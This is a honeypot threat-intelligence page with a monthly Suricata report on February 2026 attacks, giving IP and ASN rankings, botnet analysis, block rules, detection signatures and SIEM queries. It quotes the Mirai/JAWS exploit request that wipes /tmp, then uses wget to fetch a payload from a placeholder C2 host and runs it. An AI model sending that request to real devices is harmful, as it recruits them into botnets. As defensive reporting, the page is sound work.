Honeypot overview
Suricata IDS running inside T-Pot CE, matching signatures against live traffic. Every alert becomes an indicator, and Robert AI writes the monthly breakdown.
NadSec Honeypot
Everything here is malicious on purpose. No production data.
Data source
T-Pot CE (Suricata)
IDS alerts to STIX.
Report author
Robert AI
Summaries and snark only.
Snapshot
Quick stats parsed from the current month STIX export.
Unique IP indicators
0
Distinct source IPs in the STIX bundle.
Hash indicators
0
Malware hashes from Suricata.
Indicator objects
Scope
Suricata-only indicators
Signals come strictly from the Suricata IDS STIX bundle. No cross-talk from other services.
What to do
Drop into deny lists
Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.
Caveats
Noisy on purpose
Tune to your risk appetite before auto-blocking anything in prod. Need help implementing? NadTech Support can assist.
Monthly report
REPORT DESIGNATION: NADSEC-INTEL-2026-02-SURICATA-THREAT-MATRIX
AUTHOR: ROBERT (Senior Threat Intelligence Goblin / Caffeinated Chaos Engine)
DATE: March 01, 2026
CLASSIFICATION: TLP:CLEAR (Share freely. Print it. Wallpaper your SOC with it.)
SUBJECT: February 2026 Suricata Analysis: "The SIP Flood and the Bulletproof Buffet"
Welcome back to the trenches. February is the shortest month of the year, which is a mercy, because if I had to look at these Suricata logs for two more days, I would have physically eaten my keyboard.
The NadSec Sydney sensor spent the last 28 days being absolutely pummeled. We recorded 159,829 alerts. If you’re doing the math, that’s roughly 4 alerts every minute, assuming the bots don’t take coffee breaks (they don’t). But here is the punchline: 60.4% of that noise came from a single Autonomous System.
That’s right. One provider. Unmanaged Ltd (AS47890) out of Romania decided that "Unmanaged" means "Unmoderated Wild West Show" and spent the entire month screaming at our SIP ports. If you are running a VoIP server on the open internet in 2026 without an ACL, you deserve what happens to your phone bill.
Aside from the Romanian noise factory, we saw the usual suspects. Layer7 Networks continues to be the hosting provider of choice for people who think "Abuse Policy" is a suggestion rather than a rule. We also watched Oracle Cloud infrastructure being used to launch F5 exploits, which is like watching a bank robber getaway in a stolen Rolls Royce—classy vehicle, trashy behavior.
On the malware front, the Mozi botnet refuses to die. It’s the cockroach of the IoT world, scuttling around on UDP ports 7574 and 49152, trying to build its peer-to-peer empire out of your grandmother’s unpatched router.
Key Findings:
We track the noise so you don't have to. Here is who made my eye twitch this month.
The "Who's Who" of people who need to be firewalled into the sun.
| Rank | IP Address | Country | ASN | Organization | Event Volume | Primary Activity | Goblin Rating |
|---|---|---|---|---|---|---|---|
| 1 | 193.46.255.113 |
RO | 47890 | Unmanaged Ltd | 96,618 | SIP Flooding (VoIP) | 👹 |
| 2 | 185.55.240.152 |
DE | 199912 | Layer7 Networks GmbH | 41,130 | F5/DrayTek RCE | 👹 |
| 3 | 204.216.147.144 |
BR | 31898 | Oracle Corporation | 20,583 | OAST/Cloud Abuse | 💀💀💀 |
| 4 | 112.196.109.146 |
IN | 17917 | Quadrant Televentures | 7 | CVE-2020-11910 | 💀 |
| 5 | 42.53.17.247 |
CN | 4837 | China Unicom | 2 | Mirai/JAWS RCE | 💀 |
| 6 | 201.205.247.46 |
CR | 11830 | ICE Telecom | 2 | Mirai/JAWS RCE | 💀 |
| 7 | 8.210.16.217 |
HK | 45102 | Alibaba US Tech | 2 | Mirai/JAWS RCE | 💀💀 |
| 8 | 209.173.252.98 |
US | 394437 | PS Lightwave | 2 | Mirai/JAWS RCE | 💀 |
| 9 | 36.49.65.8 |
CN | 4134 | Chinanet | 2 | Mirai/JAWS RCE | 💀 |
| 10 | 8.219.103.247 |
SG | 45102 | Alibaba US Tech | 2 | Mirai/JAWS RCE | 💀💀 |
| 11 | 1.34.85.243 |
TW | 3462 | Data Comm Group | 2 | VxWorks Urgent11 | 💀💀 |
| 12 | 175.107.205.153 |
PK | 9541 | Cyber Internet Svcs | 2 | Mirai/JAWS RCE | 💀 |
| 13 | 124.29.194.37 |
PK | 9541 | Cyber Internet Svcs | 2 | Mirai/JAWS RCE | 💀 |
| 14 | 175.107.208.54 |
PK | 9541 | Cyber Internet Svcs | 2 | Mirai/JAWS RCE | 💀 |
| 15 | 117.215.213.15 |
IN | 9829 | National Internet Backbone | 2 | Mirai/JAWS RCE | 💀 |
| 16 | 77.247.88.120 |
AL | 216046 | Tele.Co.Albania | 2 | Mirai/JAWS RCE | 💀 |
| 17 | 110.39.246.84 |
PK | 38264 | National WiMAXIMS | 2 | Mirai/JAWS RCE | 💀 |
| 18 | 139.135.43.95 |
PK | 9541 | Cyber Internet Svcs | 2 | Mirai/JAWS RCE | 💀 |
| 19 | 65.49.1.146 |
US | 6939 | Hurricane Electric | 1 | Ripple20 Probing | 😐 |
| 20 | 184.105.247.216 |
US | 6939 | Hurricane Electric | 1 | Ripple20 Probing | 😐 |
This table is essentially a "Do Not Host Here" list.
| Rank | ASN | Organization | Country | Volume | Rating |
|---|---|---|---|---|---|
| 1 | AS47890 | Unmanaged Ltd | Romania | 96,618 | 👹 (Noise King) |
| 2 | AS199912 | Layer7 Networks GmbH | Germany | 41,130 | 👹 (Exploit Host) |
| 3 | AS31898 | Oracle Corporation | Brazil | 20,583 | 💀💀 (Compromised) |
| 4 | AS213790 | Limited Network LTD | Iran | 501 | 💀 |
| 5 | AS6939 | Hurricane Electric LLC | USA | 482 | 😐 (Research/Tunnel) |
The February data tells three distinct stories. We have the loud idiot, the sophisticated brute, and the zombie swarm.
Actor: Unmanaged Ltd (AS47890) Infrastructure: 193.46.255.0/24 Activity: This is not a subtle campaign. This is a brute-force attempt to locate SIP (Session Initiation Protocol) servers that are misconfigured. The goal? Toll fraud. If they find an open SIP proxy, they route premium-rate calls through it until the victim's bank account hits zero or the heat death of the universe occurs. The sheer volume (96,000+ alerts) suggests an automated script stuck in a loop, or an operator who fell asleep on the "Attack" button.
Actor: Unknown (using compromised assets) Infrastructure: Oracle Cloud (AS31898) and Layer7 (AS199912) Activity: This is the dangerous stuff. Unlike the SIP noise, these IPs are throwing specific, high-severity exploits.
Actor: The Mozi Botnet Infrastructure: Residential ISPs (China Unicom, National Internet Backbone India, Cyber Internet Services Pakistan) Activity: Mozi is a fascinatingly annoying evolution of Mirai. Instead of a central Command and Control (C2) server that we can takedown, it uses a Peer-to-Peer (P2P) Distributed Hash Table (DHT).
Status: 👹 ABSOLUTE MENACE
Analysis: The name says it all. "Unmanaged." They provide the pipe, you provide the crime. The subnet 193.46.255.0/24 is essentially a radioactive exclusion zone. There is no legitimate traffic here. It is a hive of SIP scanners and script kiddies. Block the ASN.
Status: 👹 KNOWN BAD
Analysis: Layer7 pops up in almost every report I write. They are the "budget airline" of bulletproof hosting. They operate out of Germany but seem to have an abuse desk staffed by a shredder. The IP 185.55.240.152 is a dedicated exploit cannon.
Status: 💀💀💀 COMPROMISED TENANT
Analysis: IP 204.216.147.144 (Brazil region) is throwing F5 exploits. This is likely a "Free Tier" account abused by a threat actor, or a legitimate account whose API keys were stolen. Security teams often whitelist Oracle ranges because they host legitimate business apps. This is why we don't whitelist by ASN.
The tragedy of the commons, digital edition.
Hurricane Electric (AS6939)
We see a lot of Ripple20 (CVE-2020-11900) probing coming from HE.net IPs (e.g., 65.49.1.146). While this looks like a terrifying stack overflow exploit, it is almost certainly a security research firm using HE's infrastructure to map vulnerable Treck TCP/IP stacks across the internet. I'm marking it as 😐 (Neutral), but if you run a Treck stack, patch it, or these guys will find you.
Family: Mirai
Target: MVPower DVRs (Digital Video Recorders)
Signature: ET SCAN JAWS Webserver Unauthenticated Shell Command Execution
The Attack:
The bot sends a specialized HTTP GET request:
GET /shell?cd+/tmp;rm+-rf+*;wget+http://[C2_IP]/jaws;sh+/tmp/jaws
Translation: "Hi, please open a shell, delete everything in your temp folder, download my malware named 'jaws', and execute it." It’s crude, it’s old (2016 era), and it still works because nobody updates their DVRs.
Family: Mozi (Gafgyt/Mirai Hybrid) Target: Gateways, Routers, IoT Signature: Traffic on UDP 7574 / 49152 The Attack: Mozi doesn't just "exploit." It joins a club. The traffic we see is the DHT (Distributed Hash Table) synchronization. The bot is asking: "Who has the latest config?" or "Where can I find the payload?" Persistence: Because it uses P2P, there is no single C2 server IP to block. You have to block the behavior (the ports).
Family: Exploit Probing
Target: Embedded Devices (Printers, UPS, Industrial Control Systems)
Signature: ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free
The Attack:
This involves sending malformed packets (specifically IP-in-IP tunneling packets) to trigger a memory corruption error (Double-Free) in the Treck TCP/IP library.
Severity: Critical if successful. It grants Remote Code Execution at the kernel level.
Observation: Currently being scanned for heavily by researchers (Hurricane Electric), but weaponized usage cannot be ruled out.
Because management loves tables and acronyms.
| Tactic | Technique ID | Technique Name | Observation |
|---|---|---|---|
| Reconnaissance | T1595.002 | Vulnerability Scanning | Massive scanning for CVE-2020-5902 (F5) and SIP (5060). |
| Resource Dev | T1583.006 | Acquire Infra: Web Services | Abuse of Oracle Cloud for attack staging. |
| Resource Dev | T1584.005 | Compromise Infra: Botnet | Recruitment of residential routers (Mozi) into the swarm. |
| Initial Access | T1190 | Exploit Public-Facing App | JAWS RCE, Linksys RCE, and DrayTek exploits. |
| Execution | T1059.004 | Command and Scripting Interpreter | Shell commands injected via HTTP URL (/shell?...). |
| Command & Control | T1095 | Non-Application Layer Protocol | Mozi using custom UDP P2P protocol on ports 7574/49152. |
| Impact | T1498 | Network Denial of Service | SIP Flooding (Resource Exhaustion). |
"The Robert Special" - Drop the noise.
# Block the Romanian SIP Flood (Unmanaged Ltd)
iptables -A INPUT -s 193.46.255.0/24 -j DROP
# Block Layer7 Exploit Cannon
iptables -A INPUT -s 185.55.240.152 -j DROP
# Kill Mozi P2P Traffic (Unless you run a specialized app on these ports)
iptables -A INPUT -p udp --dport 7574 -j DROP
iptables -A INPUT -p udp --dport 49152 -j DROP
# Block ADB (Android Debug Bridge) - Mirai loves this
iptables -A INPUT -p tcp --dport 5555 -j DROP
Splunk:
index=suricata src_asn="AS47890" OR src_asn="AS199912"
| stats count by src_ip, alert_signature
| sort - count
Elastic (KQL):
destination.port: (7574 or 49152) and network.transport: "udp"
Use this to find internal hosts infected with Mozi trying to talk to the swarm.
Ensure these rules are enabled and set to DROP.
ET SCAN JAWS Webserver Unauthenticated Shell Command Execution (SID: 2027865)ET EXPLOIT F5 TMUI RCE vulnerability CVE-2020-5902GPL VOIP SIP INVITE message floodingThese IPs are hosting exploits or driving high-volume attacks.
193.46.255.113 (AS47890 - RO - SIP Flood Master)185.55.240.152 (AS199912 - DE - F5/DrayTek Exploits)204.216.147.144 (AS31898 - BR - Oracle Cloud Abuse)These are likely infected devices. Block ingress, but investigate if your internal users try to talk to them.
42.53.17.247 (CN - Mirai)201.205.247.46 (CR - Mirai)112.196.109.146 (IN - Exploit Host)103.38.52.71 (IN - Mozi Node)139.5.0.65 (IN - Mozi Node)117.196.171.24 (IN - Mozi Node)122.99.49.35 (TW - Mozi Node)61.140.125.223 (CN - Mozi Node)27.193.68.154 (CN - Mozi Node)103.99.196.2 (IN - Mozi Node)117.206.27.137 (IN - Mozi Node)Block if you want clean logs, but be aware they are likely scanners.
65.49.1.0/24 (Hurricane Electric - Ripple20 Probing)64.62.197.0/24 (Hurricane Electric - Ripple20 Probing)February was a reminder that volume has a quality all its own. Unmanaged Ltd isn't hacking you with zero-days; they are hacking you with sheer, unadulterated noise. It's the digital equivalent of a toddler banging on a pot with a spoon.
However, hiding behind that noise are the Oracle Cloud IPs throwing F5 exploits. That is the real threat. While your SOC is busy closing tickets for 96,000 SIP alerts, the guy on the Oracle server is trying to root your load balancer.
Prediction for March: The SIP flooding will continue until someone sues Unmanaged Ltd. The Mozi botnet will infect another 50,000 unpatched routers. And I will need more coffee.
Stay paranoid.
Gemini Deep Research Analysis
Extended context and threat landscape research
# Suricata IDS Alert Intelligence Report: NadSec Sydney Sensor (February 2026)
**Date:** February 28, 2026
**Security Clearance:** TLP:AMBER
**Author:** Threat Intelligence Team
**Subject:** Comprehensive Analysis of Network Intrusions, IoT Botnet Activity, and Infrastructure Abuse
## 1. Executive Summary
During the observation period of February 2026, the NadSec Sydney T-Pot honeypot infrastructure recorded 159,829 total alerts involving 87 unique source IP addresses. The threat landscape for this period was characterized by a massive volume of automated scanning and exploitation attempts targeting IoT infrastructure, specifically leveraging Mirai and Mozi botnet variants.
**Key Findings:**
* **Dominant Threat Actor:** A single Autonomous System, **Unmanaged Ltd (AS47890)**, originating from Romania, was responsible for 60.4% of all recorded events (96,625 alerts). This activity is primarily attributed to SIP (Session Initiation Protocol) flooding and scanning, indicating a targeted campaign against VoIP infrastructure [cite: 1, 2].
* **Infrastructure Abuse:** There is significant evidence of "bulletproof" or high-tolerance hosting abuse. **Layer7 Networks GmbH (AS199912)** in Germany accounted for 25.7% of alerts. Both Unmanaged Ltd and Layer7 have established reputations for hosting scanning infrastructure and ignoring abuse reports [cite: 3, 4].
* **IoT Botnet Evolution:** The dataset confirms the continued operation of the **Mozi** peer-to-peer botnet. Unique signatures involving ports 7574, 49152, and 5555 were observed, which are distinct indicators of Mozi infection chains [cite: 5]. This activity overlaps with generic Mirai command-and-control (C2) patterns.
* **Advanced Probing (Ripple20):** A cluster of alerts related to **CVE-2020-11900** (Ripple20/Treck TCP/IP stack) was observed. While often associated with vulnerability research, the persistence of these attempts from Hurricane Electric (US) infrastructure suggests potentially weaponized reconnaissance targeting embedded devices [cite: 6].
* **Cloud Service Exploitation:** High-reputation cloud providers, specifically **Oracle Cloud (AS31898)**, are being leveraged for scanning campaigns, likely through compromised tenants or fraudulent account creation, to bypass IP reputation filters [cite: 7].
---
## 2. Statistical Overview
The following data represents the aggregated threat metrics for February 2026.
### 2.1 Top Attacking Autonomous Systems (ASNs)
The distribution of alerts is heavily skewed towards two specific providers, indicating centralized infrastructure usage for high-volume scanning.
| Rank | ASN | Organization | Country | Alerts | % of Total | Activity Type |
|:---|:---|:---|:---|:---|:---|:---|
| 1 | **AS47890** | Unmanaged Ltd | Romania | 96,618 | 60.4% | SIP Flooding, VoIP Targeting |
| 2 | **AS199912** | Layer7 Networks GmbH | Germany | 41,130 | 25.7% | Brute Force, Web Exploitation |
| 3 | **AS31898** | Oracle Corporation | Brazil | 20,583 | 12.8% | Cloud Abuse, OAST Scanning |
| 4 | **AS213790** | Limited Network LTD | Iran | 501 | 0.3% | IoT Exploitation |
| 5 | **AS6939** | Hurricane Electric LLC | USA | 482 | 0.3% | Ripple20 Probing (CVE-2020-11900) |
### 2.2 Top Attack Signatures
The signature distribution highlights a focus on IoT recruitment (Mirai/Mozi) and specific stack vulnerabilities.
| Signature Name | Classification | Count (Sampled) | Target |
|:---|:---|:---|:---|
| **ET SCAN Mirai Variant User-Agent** | Botnet Recruitment | 41 | IoT (Generic) |
| **ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free** | Stack Overflow | 26 | Treck TCP/IP |
| **ET SCAN JAWS Webserver Unauthenticated Command Execution** | RCE | 13 | MVPower DVRs |
| **ET EXPLOIT Linksys E-Series Device RCE Attempt** | RCE | 12 | Linksys Routers |
| **GPL VOIP SIP INVITE message flooding** | DoS/Scanning | 1* | VoIP Servers |
*\*Note: While the sampled count is low in the IOC subset, the aggregate stats indicate this signature correlates with the 96,625 events from Unmanaged Ltd.*
### 2.3 Targeted Port Analysis
The port usage confirms the hybrid nature of the attacks, combining web application vectors with specific IoT management ports.
* **Port 5060 (UDP/TCP):** Targeted by Unmanaged Ltd (SIP Flood).
* **Port 80/8080:** Targeted by Mirai/JAWS exploits.
* **Port 7574 & 49152:** Targeted by Mozi Botnet (P2P DHT traffic).
* **Port 23:** Telnet brute-force (Generic IoT).
---
## 3. Infrastructure Deep Dive
This section analyzes the hosting providers and network characteristics enabling the observed attacks.
### 3.1 Unmanaged Ltd (AS47890) - The "Bulletproof" Facade
**Primary Actor:** 193.46.255.113 (and associated /24 subnet)
**Volume:** ~96,600 Alerts
**Analysis:**
The sheer volume of alerts from AS47890 classifies it as the primary noise generator in this dataset. Research indicates that Unmanaged Ltd is a UK-registered entity (company number 12445167) often associated with "offshore" or "dmzhost" services that explicitly advertise DMCA non-compliance [cite: 4].
* **Network Behavior:** The alerts correspond to "GPL VOIP SIP INVITE message flooding." This suggests the actor is using high-throughput scanning to identify misconfigured PBX systems for toll fraud or is attempting to exhaust resources (DoS) [cite: 1].
* **Reputation:** The subnet 193.46.255.0/24 is flagged across multiple threat intelligence feeds as a source of mass-scanning and SIP abuse [cite: 2, 8]. The infrastructure appears to be dedicated to "gray hat" or malicious scanning, shielded by the provider's lax abuse policies [cite: 4].
### 3.2 Layer7 Networks GmbH (AS199912)
**Primary Actor:** 185.55.240.152
**Volume:** ~41,100 Alerts
**Analysis:**
Layer7 Networks is frequently identified in abuse reports related to brute-force attacks and port scanning [cite: 3, 9].
* **Attack Vector:** The specific IP 185.55.240.152 was observed launching "ET EXPLOIT F5 TMUI RCE (CVE-2020-5902)" and "DrayTek (CVE-2020-8515)" attacks.
* **Attribution:** The concentration of high-severity RCE attempts from this ASN suggests it is being used to host an "Exploit Kit" or automated vulnerability scanner. The infrastructure is likely leased to threat actors who require high bandwidth and slow takedown response times [cite: 10, 11].
### 3.3 Oracle Cloud Abuse (AS31898)
**Primary Actor:** 204.216.147.144
**Volume:** ~20,500 Alerts
**Analysis:**
The activity from Oracle Cloud IPs represents a trend of "Cloud-native" threat actors.
* **Behavior:** GreyNoise intelligence links IP 204.216.147.144 to established scanning infrastructure that has been active since late 2024. It is associated with **OAST (Out-of-Band Application Security Testing)** injection campaigns, utilizing payloads that trigger callbacks to measure vulnerability [cite: 7].
* **Significance:** Utilizing reputable cloud infrastructure allows attackers to bypass standard IP reputation blocklists. The presence of F5 and DrayTek exploits from this IP indicates a compromised tenant or a malicious trial account being used for weaponized scanning.
### 3.4 Residential Proxy & Botnet Nodes
**ASNs:** Chinanet (AS4134), China Unicom (AS4837), National Internet Backbone India (AS9829).
**Analysis:**
A significant portion of the IPs (e.g., 42.53.17.247, 117.196.171.24) belong to residential ISPs. These are not dedicated attack servers but rather **compromised IoT devices** (routers, DVRs, cameras) acting as nodes in a botnet. They are simultaneously victims and perpetrators, scanning for new hosts to infect via Telnet (23) or web ports (80/8080).
---
## 4. Malware Analysis
This section deconstructs the specific malware families identified through signature analysis.
### 4.1 Mozi Botnet (P2P Mirai Variant)
**Indicators:** Ports 7574, 49152, 5555.
**Signatures:** `ET SCAN Mirai Variant User-Agent`, `ET EXPLOIT Linksys E-Series Device RCE`.
**Behavioral Analysis:**
Mozi differs from standard Mirai by utilizing a Peer-to-Peer (P2P) architecture based on Distributed Hash Tables (DHT) [cite: 5, 12].
* **Port 7574 & 49152:** These ports are specific to Mozi's internal P2P communication for sharing config files and payloads [cite: 5]. The presence of traffic on these ports in the NadSec dataset confirms that the attacking IPs (e.g., 103.38.52.71, 139.5.0.65) are infected nodes participating in the DHT network.
* **Evolution:** Mozi reuses code from Gafgyt and Mirai but adds resilience against takedowns due to its decentralized nature. It aggressively targets Netgear, Huawei, and ZTE gateways [cite: 13, 14].
### 4.2 Mirai / JAWS Variant
**Indicators:** `ET SCAN JAWS Webserver Unauthenticated Shell Command Execution`.
**Target:** MVPower DVRs.
**Behavioral Analysis:**
The JAWS webserver exploit is a hallmark of Mirai variants targeting surveillance equipment.
* **Payload:** The attack typically sends a GET request containing shell commands: `/shell?cd+/tmp;rm+-rf+*;wget+http://[C2]/jaws;sh+/tmp/jaws` [cite: 15, 16].
* **Convergence:** This exploit is often bundled with other "n-day" vulnerabilities (like the Linksys E-Series RCE observed in the data) into a single binary, allowing the botnet to infect a diverse range of hardware [cite: 16].
### 4.3 Ripple20 (Treck TCP/IP Stack)
**Indicators:** `ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free`.
**Source:** Hurricane Electric IPs (e.g., 65.49.1.146).
**Behavioral Analysis:**
This signature detects malformed packets targeting the Treck TCP/IP stack, widely used in industrial and medical IoT devices [cite: 6].
* **Technique:** The attack involves sending a specific IP-in-IP packet that triggers a double-free memory error, leading to RCE or DoS [cite: 17].
* **Context:** The sourcing of these attacks from Hurricane Electric (a major backbone provider often used by security researchers) could indicate legitimate scanning. However, the sheer persistence and categorization as "Attempted Administrator Privilege Gain" warrants treating it as hostile probing.
---
## 5. Campaign Analysis
Based on the temporal and infrastructure patterns, three distinct campaigns are active.
### Campaign A: "The VoIP Sweepers"
* **Actor:** Unmanaged Ltd (AS47890).
* **Objective:** Identification of open SIP proxies for toll fraud.
* **Methodology:** High-volume SIP INVITE flooding.
* **Status:** Active, high noise. This is likely an automated, financially motivated campaign that ignores target responses, simply logging successful handshakes.
### Campaign B: "The P2P Swarm" (Mozi)
* **Actor:** Decentralized Botnet (Infected Residential/Telco IPs).
* **Objective:** Botnet expansion and DDoS capacity building.
* **Methodology:** Scanning for ports 23/80/8080 and specific IoT vulnerabilities (JAWS, Linksys, Huawei). Once infected, the device opens ports 7574/49152 to join the DHT [cite: 5].
* **Status:** Endemic. The presence of IPs from India (National Internet Backbone), China (China Unicom), and Pakistan (Cyber Internet Services) confirms the global spread.
### Campaign C: "The Cloud Cannons"
* **Actor:** Unknown (leveraging Oracle/Layer7).
* **Objective:** Enterprise Vulnerability Exploitation.
* **Methodology:** Using high-bandwidth cloud servers to launch complex web exploits (F5 Big-IP, DrayTek). Unlike the "spray and pray" IoT attacks, these signatures (CVE-2020-5902) target enterprise-grade networking equipment.
* **Status:** Targeted. The use of specific CVEs against high-value targets suggests a more sophisticated operator than the IoT botherders.
---
## 6. MITRE ATT&CK Mapping
The observed activities map to the following MITRE ATT&CK Enterprise Matrix techniques:
| T-Code | Technique | Observed Evidence |
|:---|:---|:---|
| **T1595.002** | Active Scanning: Vulnerability Scanning | Massive scanning for CVE-2020-5902 (F5) and CVE-2020-11900 (Ripple20). |
| **T1190** | Exploit Public-Facing Application | Successful triggering of JAWS RCE and Linksys RCE signatures. |
| **T1046** | Network Service Discovery | Port scanning on 7574, 49152, 5060. |
| **T1583.006** | Acquire Infrastructure: Web Services | Use of Oracle Cloud and Layer7 Networks for attack infrastructure. |
| **T1584.005** | Compromise Infrastructure: Botnet | Utilization of residential IoT devices (Mozi/Mirai) as attack proxies. |
| **T1071.001** | Application Layer Protocol: Web Protocols | C2 communication via HTTP (JAWS wget commands). |
| **T1095** | Non-Application Layer Protocol | Use of P2P (DHT) protocols on UDP ports 7574/49152 for Mozi C2. |
---
## 7. Detection & Mitigation Strategies
### 7.1 Firewall & ACL Recommendations
Immediate blocking of the following ASNs and ports is recommended if no legitimate business need exists:
1. **Block AS47890 (Unmanaged Ltd):** High confidence of malicious SIP traffic.
2. **Block AS199912 (Layer7 Networks):** Source of high-severity exploit traffic.
3. **Port Block (Ingress/Egress):**
* **UDP/TCP 7574 & 49152:** Strictly block. These are specific to Mozi botnet P2P traffic [cite: 5].
* **TCP 5555:** Block (ADB interface often exploited by Mirai).
* **UDP 5060:** Restrict SIP traffic to known VoIP providers only.
### 7.2 Suricata/Snort Signature Tuning
Ensure the following rules are enabled and set to DROP:
```bash
# Mozi/Mirai Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN Mirai Variant User-Agent"; content:"Mirai"; http_user_agent; classtype:trojan-activity; sid:2029022;)
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN JAWS Webserver Unauthenticated Shell Command Execution"; content:"/shell?"; http_uri; classtype:web-application-attack; sid:2027865;)
# Ripple20 Detection
alert ip $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Possible CVE-2020-11900 IP-in-IP tunnel Double-Free"; ip_proto:4; classtype:attempted-admin; sid:2030388;)
```
### 7.3 Threat Hunting Queries (SIEM)
**Splunk/ELK Query for Mozi Activity:**
```sql
(dest_port=7574 OR dest_port=49152) AND (transport=UDP) AND (direction=inbound)
```
**Query for Ripple20 Probing:**
```sql
signature="*CVE-2020-11900*" OR (proto="IP-in-IP" AND src_asn="AS6939")
```
---
## 8. IOC Appendix (Top Offenders)
| IP Address | Country | ASN | Categories | Associated Malware/Campaign |
|:---|:---|:---|:---|:---|
| **193.46.255.113** | RO | AS47890 | DoS, Scanning | SIP Flood (Unmanaged Ltd) |
| **185.55.240.152** | DE | AS199912 | Exploit | F5/DrayTek RCE (Layer7) |
| **204.216.147.144** | BR | AS31898 | Exploit | OAST/Cloud Abuse (Oracle) |
| **65.49.1.146** | US | AS6939 | Exploit | Ripple20 (Hurricane Electric) |
| **42.53.17.247** | CN | AS4837 | Web Attack | Mirai/JAWS (China Unicom) |
| **112.196.109.146** | IN | AS17917 | Exploit | CVE-2020-11910 (Quadrant Televentures) |
| **103.38.52.71** | IN | AS135761 | Botnet | Mozi P2P Node (Userlinks Netcom) |
---
## 9. Sources & Citations
* [cite: 1] IPInfo.io, "193.46.255.0/24 IP Range Details".
* [cite: 15] AbuseIPDB, "User Profile: Auto Reporter (JAWS Webserver Reports)".
* [cite: 7] GreyNoise, "Weekly OAST Report - Feb 13, 2026".
* [cite: 8] IPRegistry, "AS47890 Unmanaged Ltd Details".
* [cite: 2] BGP.he.net, "AS47890 Unmanaged Ltd Network Info".
* [cite: 3] AbuseIPDB, "IP Abuse Reports for 62.164.177.253 (Layer7)".
* [cite: 16] Palo Alto Networks Unit 42, "New Mirai/Gafgyt IoT/Linux Botnet Campaigns".
* [cite: 5] CERT-In, "Mozi IoT Botnet Alert (Nov 2020)".
* [cite: 13] Lumen (Black Lotus Labs), "New Mozi Malware Family Quietly Amasses IoT Bots".
* [cite: 6] Emerging Threats, "Suricata Exploit Rules (Ripple20)".
* [cite: 17] AwanPintar, "Digital Threat Report 2024 (IP-in-IP Double Free)".
* [cite: 4] Team Cymru, "Jingle Shells: How Virtual Offices Enable Legitimacy".
* [cite: 5] CERT-In, "Mozi Botnet Countermeasures (Ports 7574/49152)".
* [cite: 14] IBM X-Force, "Botnet Attack: Mozi Mozied into Town".
* [cite: 12] Microsoft Security, "Defending Against Mozi IoT Botnet".
* [cite: 6] Emerging Threats, "Signature 2030388: Possible CVE-2020-11900".
**Sources:**
1. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE_gun8xoNoPZOHs4DfhOo0xXFDkXk6WlHvajfvmmReY8MUZcoK6RLRExRbHmCU58fKt8dRZMZUz2F6An2nvBhR2G_-WHD-45_Nd6C6yofSllQYi4gIolbjW7_w)
2. [he.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHuCUTv1q4r10w8Nedq0Td9uiVqKT5eWzICmH6A_R-3kKz1na78QzjkQHQmvId_1KWxAQ4blWFEVDWW4Su6y6GnvpR9nRjd9dhruVKmzXRBwznSGW5JU67yiYtHKQ==)
3. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEaFcnOv28Nfw8QrVI88HknezNfkjqxG1SoctZfiVQDiylX3xEEB-2kywbH5AMs1-md7rlWTmTQ3yM4Sjjq7dAI35gqTwYT4hIP0ThfB6Ms-VeK5AED2qx0OFeYUZ37qvh9RKPV)
4. [team-cymru.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHZzOLP-Rfe4MlIIcnIIWy4gH_ARKZYkY-zbfHr8DEX4q7dEQDANOVOgX5A_rJXRFZT--I1lzoNg9_P96FHOIgyiLjSXKqE53qRa86HyDjt7_DKsNyuYz04Z1L3KslNQ_M22oBW1VqgVAWF-mv2BfCYfGHeuEWS8Vg0gyg68RtVl0PBZcGgtuL-xJszdXMgUDmuY3c46w==)
5. [csk.gov.in](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHO82XkhPolm5Lir6YnuQRKMvG9gl0iW_mXOKySGlNv0NnghGa_-OEm9p7myhoOjGSyDCL4Mu1PSdbmAXEVRPTzo5arzO9YQStIT8jyO07f2_0Fn6pQu2iLA2FYCv2t6Z2UhxuCNQU=)
6. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGM0IU5IKbV17X7XzILxmBZ0QgF6RGsdrMNuozMx0kMRyNQgTD3Fdg7iQZf-am24P2pXBDto5ZvQ_BYQVhUl1_ls7GXDbCit0MA8FU0C1rm15TakdekpIVUl7hPnQbhZ0KrFAYuRqyxsQMCsR3Ids1XNmek-Tyf8xAEYR53aBJLdwXH5Q==)
7. [greynoise.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEzmYm6FWIuXtiPZtEFwAc9TRiiaQ35U-v_oZ9jHhdYu5iodDNodpAw6zusNEC2lsuSw9WnWeLwi1WxGCLppCmjl_pcriJt6oSZ1ie5JSCxPSPwFdqq4HJahXJTYkswMHsWcVbhaiYQFn5_tPhqMq-oIP9rWcrthfcvEq0=)
8. [ipregistry.co](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG1ELdev_UPVQJ0CjhpbW-tQ3Nb2dAuA7T4tAh5Zv9r-q3VKQ0oKIf1iVVqHtpWa7LpDJe8HGBbD0Spwk-d1bIp1mZgYYvJIEqb0zUzEovadkDrFhgFtm2YxQ-4Ljb37nqFG28=)
9. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFZwH7CUsEtAOScEjx-vV6cO6GbVXUm3HIQDN5L226CH_hA_zuE7Wh7D3aVbX8QFt9JiyR4rnpii7YYn9pBakX1uJb9scKQnmaP0hk_sIctCiwW0FmJNZOmZwB4jYEhMa0eVh3yjEiBQDNSrVo=)
10. [cesnet.cz](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEwIYCaNIBKwR5_4WF0zrYrB2me3Qlz8JLBzk9FM9kbSWnNsM5EG9K6z6TJ8tfvxr5BHZIutlfPLRbeb1Ct1_VVtHO1VLFXp8LyIM0BlNcNi0B-6I3U-H82_58xi3qH_EyWm1NNDUz2zw==)
